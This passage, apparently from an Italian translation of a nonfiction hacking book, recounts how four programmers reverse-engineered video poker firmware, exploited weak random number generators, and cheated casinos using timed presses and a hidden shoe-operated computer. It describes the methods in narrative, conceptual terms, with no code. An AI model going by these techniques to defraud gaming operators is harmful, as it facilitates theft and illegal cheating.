tecnologia obsoleta, speravano fosse meno sofisticata e più fa- 
cile da attaccare. 

Il codice che avevano scaricato dal chip era scritto in forma 
binaria, la stringa di 1 e 0 che è il livello più elementare di istru- 
zioni per il computer. Per tradurlo in una forma con cui avreb- 
bero potuto lavorare dovevano fare prima del reverse enginee- 
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ring, un processo che ingegneri o un programmatore usano per 
capire il modo in cui è stato realizzato un certo prodotto; in que- 
sto caso voleva dire tradurre il linguaggio macchina in una for- 
ma che i quattro potevano comprendere e con cui potevano la- 
vorare. 

Alex aveva bisogno di un “disassemblatore” per tradurre il co- 
dice. Il quartetto non voleva svelare i propri piani provando ad 
acquistare il codice: sarebbe stato come entrare nella biblioteca 
del tuo quartiere per cercare di consultare dei libri su come si co- 
struisce una bomba. I quattro scrissero il loro disassemblatore. 
Un'impresa che Alex descrive “non proprio come mangiare una 
fetta di torta, ma che fu divertente e relativamente semplice”. 

Una volta che il codice della macchina del videopoker fu pas- 
sato nel nuovo disassemblatore, i tre programmatori si sedette- 
ro e iniziarono ad analizzarlo. Di solito per un ingegnere del 
software esperto è facile individuare rapidamente le sezioni di un 
programma su cui gli interessa concentrarsi. Ciò è possibile per- 
ché la persona che scrive il codice lo contrassegna in origine con 
dei “segnali stradali”: note, commenti e osservazioni che spiega- 
no la funzione di ogni sezione, qualcosa di simile a un libro che 
ha i titoli delle parti, dei capitoli e dei paragrafi contenuti all'in- 
terno di ciascun capitolo. 

Quando un programma viene compilato in una forma che la 
macchina può leggere, questi segnali stradali vengono ignorati. 
Il computer o il microprocessore non ne hanno bisogno. Così il 
codice su cui è stato effettuato il reverse engineering non contie- 
ne nessuna di queste spiegazioni utili; per mantenere la metafo- 
ra dei “cartelli stradali”, questo codice recuperato è come una 
mappa stradale senza i nomi dei luoghi e senza indicazioni di 
strade o autostrade. 

Passarono al setaccio le pagine del codice sullo schermo alla 
ricerca di risposte alle domande di base: “Qual è la logica? In che 
modo vengono mischiate le carte? In che modo vengono scelte le 
carte da sostituire?”. Ma l’obiettivo principale dei quattro in que- 
sto frangente era individuare il codice del “generatore di nume- 
ri random”. La scommessa di Alex secondo cui i programmatori 
giapponesi che avevano scritto il codice per la macchina avreb- 
bero potuto prendere delle scorciatoie, che avrebbero lasciato de- 
gli errori nella progettazione del generatore di numeri random, 
si dimostrò corretta. L'avevano fatto. 


Riscrivere il codice 


Alex sembra molto fiero quando descrive l'impresa: “Erava- 
mo programmatori; fummo bravi a fare quello che facemmo. Cal- 


26 


colammo il modo in cui i numeri nel codice si trasformano in 
carte sulla macchina e quindi scrivemmo un pezzo di codice C 
che faceva la stessa cosa”, racconta riferendosi al linguaggio di 
programmazione chiamato “C”. 


Eravamo motivati e lavoravamo ininterrottamente. Direi che ci vol- 
lero circa due o tre settimane per arrivare al punto in cui avemmo 
veramente una buona visione d'insieme di quello che accadeva esat- 
tamente nel codice. , 

Gli dai uno sguardo, fai alcune prove, scrivi un codice nuovo, lo ma- 
sterizzi sul Rom [il chip], lo rimetti nella macchina e osservi cosa 
accade. Facevamo cose come scrivere delle routine che facevano ap- 
parire dei numeri esadecimali sullo schermo sopra le carte. Di ba- 
se, cercavamo di ottenere una specie di visione d'insieme del modo 
in cui il codice gestisce le carte. 

Era una combinazione di prove, errori e analisi dall’alto in basso; il 
codice iniziò ad avere un senso piuttosto rapidamente. Così capim- 
mo tutto del modo esatto in cui i numeri nel computer si trasfor- 
mano in carte sullo schermo. 

La nostra speranza era che il generatore di numeri random fosse re- 
lativamente semplice. E nel caso dei primi anni novanta, lo era. Ave- 
vo fatto un pọ’ di ricerche e avevo scoperto che era basato su qual- 
cosa di cui Donald Kruth aveva scritto negli anni sessanta. I pro- 
grammatori non avevano inventato nulla, avevano semplicemente 
preso delle ricerche esistenti sui metodi Montecarlo e altre cose del 
genere, e le avevano messe nel loro codice. 

Trovammo esattamente l'algoritmo che stavano utilizzando per ge- 
nerare le carte; si chiama registro di cambiamento del feedback li- 
neare, ed era un generatore di numeri random abbastanza buono. 


Ma presto scoprirono che il generatore di numeri random 
(Rng) aveva un difetto fatale che rendeva il loro compito molto 
più agevole. Mike spiega che “si trattava di un semplice Rng a 32- 
bit, così la complessità informatica del craccarlo era alla nostra 
portata, e con poche ottimizzazioni divenne quasi ordinario”. 

E così i numeri prodotti non erano veramente casuali. Ma 
Alex pensa che ci sia una buona ragione del perché sia così: 


Se fossero veramente casuali, non potrebbero predisporre il risul- 
tato, Non potrebbero verificare qual è il vero risultato. Alcune mac- 
chine davano delle scale reali consecutive. Non dovrebbero uscire 
per niente. Così i programmatori vogliono essere in grado di verifi- 
care che hanno le statistiche giuste o sentono di non avere il con- 
trollo del gioco. 

Un'altra cosa che i programmatori non avevano realizzato proget- 
tando questa macchina è che fondamentalmente non hanno biso- 
gno solo di un generatore di numeri random. Statisticamente ci so- 
no dieci carte per ogni mano, le cinque che vengono mostrate ini- 
zialmente e una carta alternativa per ciascuna delle cinque, che ap- 
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parirà solo se il giocatore decide di cambiare. Scoprimmo che nel- 
le prime versioni della macchina di fatto pescavano le dieci carte da 
dieci numeri random in sequenza prodotti dal generatore di nume- 
ri random. 


E così Alex e soci capirono che le istruzioni per la program- 
mazione di queste macchine di prima generazione erano state 
pensate in modo approssimativo. E in virtù di questi errori, vi- 
dero che potevano scrivere un algoritmo relativamente semplice 
ma abbastanza intelligente per battere la macchina. 

Il trucco, pensò Alex, sarebbe stato iniziare una partita, ve- 
dere quali carte apparivano sulla macchina é inserire dei dati nel 
loro computer di casa che identificavano queste carte. Il loro al- 
goritmo avrebbe calcolato il punto in cui si trovava il generatore 
random e quanti numeri sarebbero dovuti passare prima che fos- 
se stato pronto a estrarre la mano voluta: la scala reale. 


E così siamo intorno alla nostra macchina per il test e lanciamo il 
nostro programmino, che ci dice l'esatta sequenza di carte che usci- 
ranno. Eravamo piuttosto eccitati. 


Alex attribuisce quell’eccitazione al “sapere che sei più in gam- 
ba di qualcun altro e che li puoi battere. E questo, nel nostro ca- 
so, ci stava per far guadagnare dei soldi”. 

Andarono a fare compere e trovarono un orologio da polso 
Casio con una funzione di conto alla rovescia che poteva calco- 
lare i decimi di secondo; ne comprarono tre, uno per ciascuno di 
loro che sarebbero andati ai casinò; Larry sarebbe rimasto fuori 
per gestire il computer. 

Erano pronti per iniziare a sperimentare il metodo. Uno di 
loro avrebbe iniziato a giocare e avrebbe chiamato la mano di 
carte ricevute, il numero e il colore di tutte e cinque le carte. 
Larry avrebbe inserito i dati nel computer; anche se era di una 
marca sconosciuta, era un tipo di macchina molto popolare tra 
nerd e smanettoni. E perfetta per il loro scopo perché aveva un 
chip molto più veloce di quello della macchina di videopoker 
giapponese. Ci vollero solo pochi istanti per calcolare il tempo 
esatto da inserire in uno dei cronometri Casio con il conto alla 
rovescia. 

Quando il conto alla rovescia scadeva, la persona alla slot ma- 
chine avrebbe premuto il tasto play. Ma questo doveva essere fat- 
to precisamente in una frazione di secondo. Il che non era il gran 
problema che potrebbe sembrare, spiega Alex: 


Due di noi erano stati musicisti per un certo periodo di tempo. Se 


sei un musicista e hai un buon senso del ritmo, puoi schiacciare un 
bottone con un'approssimazione di cinque millesimi di secondo. 
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Se tutto avesse funzionato nel modo in cui avrebbe dovuto, 
la macchina avrebbe mostrato la scala reale voluta. 

Provarono sulla loro macchina, facendo pratica finché cia- 
scuno di loro non fu in grado di ottenere la scala reale con una 
percentuale decente di prove. 

Nei mesi precedenti, avevano, nelle parole di Mike, “fatto re- 
verse engineering sulle operazioni della macchina, appreso esat- 
tamente il modo in cui i numeri random venivano trasformati in 
carte sullo schermo, precisamente quando e quanto velocemen- 
te il Rng si ripeteva, tutte le idiosincrasie di rilievo della macchi- 
na, e sviluppato un programma che prendeva in considerazione 
tutte queste variabili in modo tale che, una volta conosciuto lo 
stato di una certa macchina in un istante preciso nel tempo, po- 
tevamo predire con un alto livello di accuratezza l’esatta sequenza 
del Rng in qualsiasi momento nelle ore e persino nei giorni suc- 
cessivi”. 

Avevano battuto la macchina, l'avevano trasformata nel loro 
schiavo. Avevano accettato una sfida intellettuale da hacker e ave- 
vano avuto successo. Quella conoscenza avrebbe potuto render- 
li ricchi. 

Era stato divertente sognare a occhi aperti. Ce l'avrebbero fat- 
ta a portare il sogno nella giungla di un casinò? 


Si ritorna al casinò, questa volta per giocare 


Una cosa è smanettare sulla tua macchina in uno spazio pri- 
vato e sicuro. Prendere posto nel bel mezzo del delirio di un ca- 
sinò e cercare di rubare i loro soldi è tutta un’altra cosa. Ci vo- 
gliono nervi d'acciaio. 

Le donne pensavano che il viaggio fosse una boutade. Gli uo- 
mini le avevano incitate a indossare gonne aderenti e a mante- 
nere un atteggiamento sopra le righe — giocare, chiacchierare, ri- 
dere in modo eccessivo, ordinare da bere — sperando che il per- 
sonale della sala di sicurezza che gestiva le telecamere a circuito 
chiuso fosse distratto dai bei volti e dalla carne in mostra. “Spin- 
gemmo su questo tasto più che potemmo,” ricorda Alex. 

La speranza era di riuscire a confondersi semplicemente tra 
la folla. “Mike era il migliore. Era quasi pelato. Lui e sua moglie 
sembravano una coppia di giocatori tipici.” 

Alex racconta la scena come se fosse accaduta ieri. Marco e 
Alex la descrivono probabilmente in modo un po’ differente ma 
questa è la versione di Alex. Insieme a sua moglie Annie, si fece 
un giro in un casinò e si scelse una macchina di videopoker. Ave- 
va bisogno di sapere con estrema precisione il tempo esatto del 
ciclo della macchina. Un metodo che usarono comportava infila- 
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re una videocamera in una borsa da spalla; al casinò, il giocatore 
avrebbe piazzato la borsa in modo che l’obiettivo della videoca- 
mera avrebbe inquadrato lo schermo della macchina di video- 
poker, registrandolo per un po’. “Poteva essere rischioso,” ricor- 
da, “cercare di posizionare la borsa nel modo giusto senza far sem- 
brare che quella posizione fosse veramente importante. Non vo- 
levamo fare nulla che apparisse sospetto e attirasse l’attenzione.” 
Mike preferiva un altro metodo, meno impegnativo: “Il tempo del 
ciclo delle macchine a noi sconosciute veniva calcolato leggendo 
le carte sullo schermo due volte, a molte ore di distanza una dal- 
l’altra”. Doveva verificare che la macchina non fosse stata usata 
nel frattempo, perché ciò avrebbe alterato il tempo di iterazione, 
ma non era una cosa difficile. Bastava controllare che le carte usci- 
te fossero le stesse dell'ultima volta che era stato alla macchina, il 
che era abbastanza frequente visto che “le macchine con puntate 
alte di solito non vengono usate spesso”. 

Quando procedeva alla seconda lettura delle carte, Mike sin- 
cronizzava il suo cronometro; poi telefonava e dettava i dati sul tem- 
po della macchina e sulla sequenza di carte a Larry, il quale li in- 
seriva nel computer di casa e lanciava il programma. Sulla base di 
quei dati, il computer prevedeva l'uscita della scala reale seguente. 
“Speravi si trattasse di ore, a volte ci volevano giorni,” nel qual ca- 
so dovevano ricominciare da capo con un’altra macchina, forse in 
un albergo diverso. A quel punto, la sincronizzazione del Casio po- 
teva sforare di un minuto, ma era comunque abbastanza vicina. 

Nel caso in cui qualcuno fosse già alla macchina prescelta, 
Alex e Annie tornavano al casinò e passavano del tempo su altre 
macchine finché il giocatore non se ne andava. Quindi Alex si se- 
deva alla macchina scelta e Annie a quella accanto. Iniziavano a 
giocare, fingendo di divertirsi. Quindi: 


Iniziavo una partita, sincronizzandola attentamente con il crono- 
metro. Quando partiva una nuova mano, mandavo a memoria il nu- 
mero e il colore di ciascuna delle cinque carte e continuavo a gio- 
care finché non riuscivo a memorizzare una sequenza di otto carte. 
Facevo cenno a mia moglie che ero pronto e cercavo una cabina te- 
lefonica poco in vista appena fuori dal casinò. Avevo circa otto mi- 
nuti per arrivare al telefono, fare quello che dovevo fare e ritornare 
alla macchina. Mia moglie continuava a giocare. Se nel frattempo 
veniva qualcuno per giocare alla mia macchina, lei le diceva che il 
posto era occupato da suo marito. 

Avevamo trovato un modo per fare uno squillo al cercapersone di 
Larry e per digitare i numeri sulla tastiera del telefono comunican- 
dogli così le carte. Lo facevamo in modo tale da non dover parlare. 
Gli addetti dei casinò sono sempre all'erta per situazioni come que- 
ste. Quindi Larry inseriva le carte nel computer e faceva girare il 
programma. i 
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Poi lo chiamavo. Larry teneva la cornetta vicino al computer, il qua- 
le emetteva due serie di piccoli toni. Alla prima, schiacciavo il pul- 
sante “pausa” del cronometro. Alla seconda, schiacciavo di nuovo 
“pausa” per riavviare il cronometro. 


Le carte trasmesse da Alex dicevano al computer il punto esat- 
to in cui si trovava il generatore di numeri random della mac- 
china. Registrando il ritardo ordinato dal computer, Alex inseri- 
va una correzione fondamentale nel conto alla rovescia del cro- 
nometro, in modo tale che questi suonasse esattamente nel mo- 
mento in cui la scala reale era pronta a uscire. 


Una volta che il conto alla rovescia veniva riavviato, tornavo alla 
macchina. Quando il cronometro faceva “beep, beep, boom”, pro- 
prio in quell’istante, proprio sul “boom”, schiacciavo nuovamente il 
tasto play della macchina. 

La prima volta credo che vinsi trentacinquemila dollari. 
Arrivammo al punto in cui riuscivamo a vincere con una percen- 
tuale del 30-40 percento perché tutto quanto funzionava piuttosto 
bene. Le volte in cui non funzionava era solo quando non prendevi 
i tempi giusti. 


Per Alex la prima volta che vinse fu “piuttosto eccitante, ma 
spaventoso. Il capo dell’area del gioco d’azzardo era un tipo ita- 
liano dall’aria truce. Ero sicuro che mi stesse guardando in mo- 
do strano, con quest’espressione di stupore sulla faccia, forse per- 
ché andavo al telefono di continuo. Pensai che sarebbe potuto 
andare di sopra a dare uno sguardo alle cassette”. Nonostante le 
tensioni, c'era “un che di emozionante in tutto ciò”. Mike ricor- 
«da di essere stato “ovviamente nervoso che qualcuno potesse aver 
notato un comportamento strano da parte mia, ma in realtà nes- 
suno mi aveva guardato in modo sospetto. Mia moglie e io veni- 
vamo trattati semplicemente come tipici vincitori di grosse som- 
me, con tutte le congratulazioni e i complimenti del caso”. 

Vincevano talmente tanto che sentirono il bisogno di preoc- 
cuparsi che la vincita di così tanti soldi avrebbe attirato l’atten- 
zione su di loro. Iniziarono a riconoscere che si trovavano di fron- 
te al curioso problema di avere troppo successo. “Eravamo a un 
livello molto alto. Stavamo vincendo grossi premi nell’ordine di 
decine di migliaia di dollari. Una scala reale paga 4000 a 1; su 
una macchina da cinque dollari a partita, sono venti testoni.” 

E da lì si continua a salire. Alcuni giochi sono di un tipo chia- 
mato “progressivo”: il premio continua a salire finché qualcuno 
non se lo aggiudica, e il gruppo era in grado di vincerlo in modo 
altrettanto facile, 


Ne vinsi uno da quarantacinque testoni. Venne fuori un tecnico con 
un cinturone, probabilmente lo stesso tipo che va in giro a riparare 
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le macchine. Ha una chiave speciale che gli altri tipi del casinò non 
hanno. Apre la macchina, tira fuori la scheda [elettronica], estrae il 
chip Rom proprio di fronte a me. Ha con sé un lettore Rom che usa 
per controllare il chip della macchina contro una specie di master 
dorato che tiene sottochiave. 


Alex venne a sapere che il test del Rom era una procedura 
standard da anni. Alex pensa che erano “già stati fregati in quel 
modo” ma alla fine avevano individuato il trucco e messo in at- 
to il controllo del Rom come contromisura. 

L'affermazione di Alex mi ha lasciato con una curiosità: i ca- 
sinò fanno questi controlli perché alcuni tipi, che poi ho incon- 
trato in prigione, avevano effettivamente sostituito il firmware? 
Mi chiesi come avevano potuto farlo in un modo abbastanza ve- 
loce da evitare di essere beccati. Alex dice che secondo lui si trat- 
ta di social engineering, che hanno fatto un accordo con la sicu- 
rezza e pagato qualcuno all’interno del casinò. Ipotizza che pos- 
sano persino sostituire il master d’oro con cui i casinò dovreb- 
bero verificare il chip della macchina. 

La bellezza dell’hack del suo gruppo, insiste Alex, era che non 
avevano dovuto cambiare il firmware. E pensavano che il loro 
approccio offrisse una sfida molto più interessante. 

Il gruppo non poteva continuare a vincere forte come stava 
facendo; i quattro pensarono che “era chiaro che prima o poi 
qualcuno avrebbe fatto due più due e avrebbe detto: ‘Ho già vi- 
sto quel tipo’. Iniziammo ad avere paura di essere beccati”. 

Oltre alla preoccupazione costante di essere scoperti, erano an- 
che preoccupati per le tasse; per ogni vittoria superiore ai mille- 
duecento dollari, il casinò chiede un documento di identità e de- 
nuncia i pagamenti all'Ufficio delle imposte federali. Mike ricor- 
da: “Pensavamo che se il giocatore non avesse esibito un docu- 
mento, le tasse sarebbero state detratte dalla paga, ma non vole- 
vamo attirare l’attenzione su di noi cercando di scoprirlo”. Pagare 
le tasse “non era un gran problema”, ma “inizia a lasciare una trac- 
cia che stai vincendo delle somme di denaro pazzesche. Così gran 
parte della nostra attenzione era sul come non farsi notare”. 

Avevano bisogno di escogitare un approccio differente. Dopo 
un breve periodo da “E.T. telefono casa”, iniziarono a concepire 
una nuova idea. 


Il nuovo approccio 
I quattro questa volta cambiarono strategia: sviluppare un 
metodo per vincere con punteggi come il full, la scala o il colore, 


in modo tale che le vincite non fossero così eccessive da attirare 
l'attenzione. Renderlo in qualche modo meno appariscente e quin- 
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di eliminare il fastidio di dover correre al telefono prima di ogni 
partita. 

Siccome i casinò offrivano solo un numero limitato di mac- 
chine giapponesi, questa volta i quattro scelsero una macchina 
di più largo uso, prodotta da una società americana. La apriro- 
no nello stesso modo e scoprirono che il processo di generazio- 
ne dei numeri random era molto più complesso: la macchina uti- 
lizzava due generatori che funzionavano in modo combinato, in- 
vece di uno solo. Alex ne dedusse che “i programmatori erano 
molto più coscienti delle possibilità di hackeraggio”. 

Ma ancora una volta i quattro scoprirono che i programma- 
tori avevano commesso un errore cruciale: “Evidentemente ave- 
vano letto un testo che diceva che si può migliorare la qualità del 
‘fattore caso’ se si aggiunge un secondo registro, ma lo avevano 
fatto male”. Per determinare una qualsiasi carta, un numero pe- 
scato dal primo generatore di numeri random veniva sommato 
a un numero preso dal secondo. 

Il modo giusto per progettarlo vuole che il secondo genera- 
tore “iteri” — cioè cambi valore — dopo l'estrazione di ogni carta. 
I programmatori non l'avevano fatto; avevano programmato il se- 
condo registro per iterare solo all’inizio di ogni mano, in modo 
tale che lo stesso numero veniva aggiunto al risultato del primo 
registro per ogni carta della mano. 

Per Alex, l’uso di due registri rendeva la sfida “una cosa da 
esperti di crittografia”; riconobbe che era simile a una procedu- 
ra usata a volte per crittare i messaggi. Anche se aveva alcune co- 
noscenze sull'argomento, non erano sufficienti a fargli intrave- 
dere una soluzione, così iniziò a fare visita a un'università nei pa- 
raggi per studiare: 


Se i programmatori avessero letto alcuni libri sui sistemi cifrati più 
attentamente, non avrebbero commesso questo errore. Inoltre, 
avrebbero dovuto essere più metodici nel testare i sistemi di crac- 
caggio simili al modo in cui noi stavamo craccando. 

Un qualsiasi bravo studente di informatica del college, una volta ca- 
pito ciò di cui c'è bisogno, potrebbe probabilmente scrivere un codi- 
ce per fare quello che stavamo cercando di fare. La parte più da sma- 
nettoni era calcolare degli algoritmi in grado di effettuare la ricerca 
rapidamente, in modo che ci sarebbero voluti solo pochi secondi per 
analizzare cosa stava accadendo; se lo si faceva senza l’esperienza ne- 
cessaria, ci sarebbero volute delle ore per una soluzione. 

"Siamo programmatori piuttosto bravi, con questo lavoro ci viviamo 
ancora tutti, così arrivammo a delle ottimizzazioni molto intelli- 
genti. Ma non direi che fu un lavoro semplice. 


Ricordo un errore simile commesso da un programmatore 
della Norton (prima che fosse acquisita dalla Symantec) che 
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aveva lavorato sul prodotto Diskreet, un'applicazione che per- 
metteva a un utente di creare dei drive virtuali criptati. Lo svi- 
luppatore aveva implementato l'algoritmo in maniera sbaglia- 
ta - forse intenzionalmente — in un modo che finiva per ridur- 
re lo spazio destinato alla chiave di cifratura da 56 a 30 bit. Lo 
standard di criptazione dei dati del governo usava una chiave a 
56 bit, che veniva considerata sicurissima, e la Norton garantì 
ai suoi clienti che i loro dati sarebbero stati protetti da questo 
standard. A causa dell'errore del programmatore, i dati dell’u- 
tente venivano in realtà cifrati a 30 bit. Anche a quei tempi era 
possibile “forzare” una chiave a 30 bit. Ogni persona che face- 
va uso di questo prodotto lavorava con un falso senso di sicu- 
rezza: un intruso avrebbe potuto arrivare alla chiave in un tem- 
po ragionevole e accedere ai dati personali dell’utente. I quat- 
. tro avevano scoperto un errore dello stesso tipo nella program- 
mazione della macchina. 

Mentre i ragazzi lavoravano al programma che avrebbe loro 
permesso di vincere contro la nuova macchina prescelta, faceva- 
no pressione su Alex per escogitare un sistema per evitare di ri- 
correre al telefono pubblico. Scoprirono che la soluzione era con- 
tenuta in una pagina del libro Eudaemonic Pie: un computer “in- 
dossabile”. Alex ideò un sistema composto da un computer in mi- 
niatura costruito attorno a una piccola scheda per microproces- 
sori che Mike e Marco avevano trovato in un catalogo. E, per com- 
pletarlo, vi aggiunse un pulsante di controllo che si infilava in 
una scarpa e un vibratore silenzioso simile a quelli implementa- 
ti oggi in molti cellulari. Chiamarono il sistema il loro “compu- 
ter-da-tasca”. 

. “Dovevamo essere un po’ svegli per farlo su un piccolo chip 
con una piccola memoria,” dice Alex. “Costruimmo un hardwa- 
re carino che entrava in una scarpa ed era ergonomico.” (Per “er- 
gonomico” in questo contesto, credo che volesse intendere ab- 
bastanza piccolo da poterci camminare senza zoppicare!) 


Il nuovo attacco 


Il gruppo iniziò a provare il nuovo piano, ma era un po’ sner- 
vante. Certo, ora potevano fare a meno di dover correre al te- 
lefono prima di ogni vincita. Ma anche con tutta la pratica fatta 
con le “prove costumi” nel loro “ufficio”, la sera dell’inaugura- 
zione significava recitare davanti a un pubblico ragguardevole di 
addetti della sicurezza sempre all'erta. 

Questa volta il piano era stato escogitato in modo tale che po- 
tessero restare seduti più a lungo di fronte a una macchina e vin- 
cere una serie di somme più piccole e meno capaci di destare so- 


34 


spetti. Alex e Mike rievocano in parte quella tensione nel descri- 
vere come funzionava. 


ALEX: Di solito mettevo il computer in tasca, dentro quella che sem- 
brava una piccola radio a transistor. Facevamo passare un cavo dal 
computer fino a dentro al calzino, per farlo entrare in un interrut- 
tore nella scarpa. 

MIKE: Il mio lo avevo fissato alla caviglia. Avevamo fatto gli inter- 
ruttori con dei pezzetti di breadboard [materiale usato nei labora- 
tori hardware per costruire dei modelli in scala dei circuiti elettro- 
nici]. I pezzi erano di circa due-tre centimetri quadrati, con un pul- 
sante in miniatura. E vi avevamo cucito sopra un pọ’ di elastico che 
passava intorno all’alluce. Poi avevamo fatto un buco nella soletta 
del Dr. Scholl's per mantenerlo fermo nella scarpa. Era scomodo so- 
lo se lo usavi tutto il giorno; in quel caso poteva diventare insop- 
portabile. 

ALEX: Così entro nel casinò, cerco di sembrare calmo, mi comporto 
come se non avessi niente, nessun filo nei pantaloni. Salgo al piano 
di sopra e inizio a giocare. Avevamo un codice, una specie di codi- 
ce Morse. Inserisco dei soldi per accumulare un credito, così non 
devo continuare a inserire monete, e inizio a giocare. Quando esco- 
no le carte, clicco sul bottone nella scarpa per registrare le carte che 
mi compaiono. 

Il segnale va dal pulsante nella scarpa al computer nella tasca dei 
miei pantaloni. Di solito nelle prime macchine ci volevano sette o 
otto carte per sincronizzarlo. Ricevi cinque carte a mano, cambiar- 
ne tre è una cosa molto comune, tieni la coppia, scarti le altre tre, 
sono otto carte. 

MIKE: Il codice per schiacciare il bottone nella scarpa era binario e 
si serviva anche di una tecnica di compressione simile al cosiddet- 
to “codice di Huffman”. Così lungo-corto corrispondeva a uno-zero, 
un due binario. Lungo-lungo era uno-uno, un tre binario e così via. 
Non c'erano carte che richiedevano più di tre tocchi. 

ALEX: Se tenevi il bottone schiacciato per tre secondi, quello era un 
cancella. E [il computer] ti dava dei piccoli segnali - tipo dup-dup- 
dup -che significava: “Okay, sono pronto a registrare”. Avevamo fat- 
to pratica, ti dovevi concentrare e imparare come farlo. Dopo un po’ 
eravamo in grado di schiacciare il pulsante mentre conversavamo 
con un addetto del casinò. 

Una volta che avevo digitato del codice per identificare circa otto car- 
te, quell’informazione mi bastava a sincronizzarmi, con un 99 per- 
cento di probabilità di successo. Così dopo un tempo qualsiasi, da po- 
chi secondi a un minuto o giù di Îì, il computer suonava tre volte. Ero 
pronto a entrare in azione. 


A questo punto, ilcomputertascabile aveva individuato il pun- 
to nell’algoritmo che rappresentava le carte appena estratte. Sic- 
come il suo algoritmo era lo stesso di quello della macchina di 
videopoker, il computer “conosceva” le cinque carte sostitutive in 
attesa dopo che il giocatore aveva selezionato i suoi scarti, e gli 
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segnalava quali carte tenere per ricevere una mano vincente. Alex 
continua: 


Il computer mi dice cosa fare inviando dei segnali a un vibratore 
nella tasca; avevamo ottenuto i vibratori gratuitamente tirandoli fuo- 
ri da vecchi cercapersone. Se il computer vuole che tieni la terza e 
la quinta carta, fa beep, beep, beeeeep, beep, beeeeep, che avverti 
come una vibrazione nella tasca. 

Calcolammo che se avessimo giocato facendo attenzione, avrem- 
mo avuto un vigorish* tra il 20 e il 40 percento, il che significava 
un 40 percento di vantaggio su ogni mano. È una percentuale enor- 
me, i migliori giocatori di black jack al mondo hanno circa il 2,5 
percento. 

Se sei seduto a una macchina da cinque dollari e inserisci cinque mo- 
nete alla volta, due volte al minuto, puoi fare venticinque dollari al 
minuto. In mezz'ora, potevi fare facilmente mille dollari. Le persone 
che giocano hanno fortuna in quel modo ogni giorno. Forse il 5 per- 
cento delle persone che si siedono e giocano per mezz'ora vince così 
tanto. Noi eravamo in quel 5 percento ogni volta che giocavamo. 


Ogni volta che uno di loro vinceva in un casinò, si spostava 
in un altro. Ognuno ne batteva di solito quattro o cinque di se- 
guito. Quando facevano ritorno allo stesso casinò in un altro viag- 
gio, il mese seguente, si assicuravano di entrare in un’altra ora 
del giorno durante un turno differente degli addetti, persone che 
avevano meno possibilità di riconoscerli. Iniziarono anche a bat- 
tere i casinò di altre città come Reno, Atlantic City e altrove. 

I viaggi, il gioco, le vincite divennero a poco a poco routine. 
Ma in un'occasione, Mike pensò che il momento temuto da tutti 
fosse arrivato. Era appena “salito di livello” e stava giocando al- 
le macchine da venticinque dollari per la prima volta, il che al- 
zava la tensione perché più alto è il valore delle macchine più so- 
no controllate da vicino. 


Ero un pọ’ ansioso ma le cose stavano andando meglio del previsto. 
Avevo vinto cinquemila dollari in un tempo relativamente breve. 
Quindi un addetto dalla mole imponente mi batte sulla spalla. Lo 
guardai sentendo una specie di nausea alla bocca dello stomaco. 
Pensai: “E finita”. 

“Ho notato che sta giocando da un po’,” mi disse. “La preferisce ro- 
sa o verde?” 


Se fossi stato al suo posto, mi sarei chiesto: “Che cos'è, la scel- 
ta del colore di cui diventerò dopo che hanno finito di gonfiarmi 


4 Nel poker dei casinò, il vigorish è la somma che il croupier accantona da 
ogni puntata dei giocatori. Il vincitore della mano raccoglie tutte le somme ac- 
cantonate. [N.d.T]. 
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come una polpetta?”. Penso che avrei lasciato tutti i soldi sul po- 
sto e avrei cercato di catapultarmi fuori. Mike dice che a quel 
punto era abbastanza esperto da rimanere calmo. 

L'uomo disse: “Vogliamo offrirle una tazza di caffè di con- 
gratulazione”. 

Mike scelse la verde. 

Anche Marco ebbe il suo momento di tensione. Stava aspet- 

tando una mano di vincita quando un caporeparto che non ave- 
va notato gli sbucò da dietro la spalla. “Ha raddoppiato a cin- 
quemila dollari, questa si chiama fortuna,” disse sorpreso. Una 
vecchia signora seduta alla macchina accanto se ne uscì con una 
voce di carta vetrata da fumatrice: “Non... era... fortuna”. Il ca- 
poreparto si irrigidì insospettito. “Erano palle,” gracchiò. Il ca- 
poreparto sorrise e si allontanò. 

Nell'arco di circa tre anni, i quattro alternarono lo svolgi- 
mento di lavori di consulenza per tenere aggiornate le loro ca- 
pacità e contatti, con lo svignarsela di tanto in tanto per allinea- 
re le loro tasche alle macchine di videopoker. Comprarono anche 
altre due macchine — compreso il modello di videopoker mag- 
giormente in uso — e continuarono ad aggiornare il software. 

Nei loro viaggi, i tre membri del gruppo che si spostavano en- 
travano in casinò diversi, “per non andare tutti insieme”, dice 
Alex. “Lo facemmo una o due volte, ma era stupido.” Anche se 
‘avevano un accordo per fare in modo che sapessero tutti, di tan- 
to in tanto uno di loro se ne andava in una delle città del gioco 
senza dirlo agli altri. Ma limitarono le loro partite ai casinò, non 
giocando mai in posti come le catene dei 7-Elevens o i centri com- 
merciali perché “in genere pagano veramente poco”. 


Beccati! 


Alex e Mike cercavano entrambi di essere disciplinati sul ri- 
spetto di “certe regole che sapevamo avrebbero ridotto la proba- 
bilità di essere notati. Una di queste era di non vincere mai trop- 
pi soldi in un posto, di non passarci mai troppo tempo, di non 
andarci mai troppi giorni di seguito”. 

Ma Mike prendeva il senso di disciplina ancora più seria- 
mente, mentre aveva la sensazione che gli altri due non fossero 
abbastanza cauti. Accettava di vincere un po’ meno all’ora, ma di 
apparire di più come un tipico giocatore. Se in una mano rice- 
veva due assi e il suo computer gli consigliava di scartarne uno 
o entrambi per una mano ancora migliore — per esempio tre jack 
-non lo faceva. Tutti i casinò impiegano dei controllori ai moni- 
tor delle telecamere a circuito chiuso, nelle camere di sicurezza 
ai piani superiori delle sale da gioco. Controllori che gestiscono 
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una sfilza di telecamere che possono roteare, mettere a fuoco e 
zoomare, alla ricerca di bari, dipendenti disonesti e di altre per- 
sone tentate da tutti quei soldi. Se a uno degli “spioni” fosse ca- 
pitato di dare un'occhiata alla sua macchina per qualche ragio- 
ne, avrebbe immediatamente capito che c'era qualcosa che non 
andava, visto che nessun giocatore razionale scarterebbe una cop- 
pia d'assi. Nessuno che non stesse barando poteva sapere in qual- 
che modo che c'era una mano migliore in attesa. 

Alex non era così scrupoloso. Marco lo era ancora meno. Se- 
condo Alex “Marco era un po’ spaccone”: 


È un tipo molto in gamba, autodidatta, non ha mai finito le supe- 
riori, ma è uno di questi tipi brillanti e sgargianti dell'Europa del- 
VESt. 

Sapeva tutto di computer, ma era convinto che i casinò fossero stu- 
pidi. Era facile pensarlo perché queste persone ci lasciavano anda- 
re via con così tanti soldi. In effetti era così, tuttavia penso che Mar- 
co fosse troppo sicuro di sé. 

Era uno spericolato e non manteneva un profilo basso, perché sem- 
brava semplicemente un adolescente forestiero. Insomma penso che 
